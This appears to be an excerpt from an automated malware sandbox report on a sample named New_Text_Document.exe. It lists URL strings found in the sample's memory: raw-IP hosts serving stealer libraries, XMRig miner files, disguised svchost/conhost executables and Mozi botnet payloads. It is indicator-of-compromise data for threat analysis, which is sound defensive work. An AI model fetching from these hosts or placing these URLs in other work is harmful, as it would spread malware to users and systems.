                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.84/WatchDog.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.84/WinRing0x64.sys
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.84/conhost.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.84/svchost.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.84/xmrig.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.218.243.155:38835/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.34.45.65:42419/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.45.176.204:11975/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.146.128.238:21394/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.149.29.151:7704/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.150.236.201:25587/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.152.190.22:4445/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.156.254.118:16882/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.157.219.170:43369/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.202.197.14:6185/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.35.172.81:63937/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.35.210.194:37461/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.35.210.194:37461/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.35.210.194:37461/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.35.216.175:58832/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.38.241.103:1050/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.38.241.105:23421/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.155.210.240:38755/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.156.160.150:42155/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.163.7:12988/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.171.182:16957/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.232.39:43760/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.233.14:1941/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.245.160:4253/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.245.35:21388/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.68.5.140:9646/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.70.216.144:42508/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.70.239.115:42431/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.70.239.115:42431/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.70.239.115:42431/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.70.239.115:42431/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.71.105.242:47742/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.74.212.55:40154/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.85.163.80:1336/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.85.82.211:28995/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.86.80.159:58065/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.89.121.234:27390/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.89.123.232:62391/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.117.35.167:47616/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.123.163.115:57600/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.124.152.6:39746/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.124.156.188:43475/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.127.157.153:44965/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.127.161.129:63256/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.132.75.58:29165/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.208.77.116:22934/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.70.132.106:11237/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.72.137.36:21404/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.72.23.84:59531/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.79.66.205:49677/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.80.194.194:30419/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.80.66.143:50515/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.81.163.38:58281/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.82.158.221:20739/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.83.177.93:58900/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.87.145.26:34971/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.90.64.141:25970/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.93.158.63:19275/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.93.194.80:8201/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.94.76.109:20434/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.95.2.136:33765/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.145.146.29:3724/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.147.184.207:6491/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.15.6.66:51378/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.15.6.66:51378/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.152.81.125:18153/.i
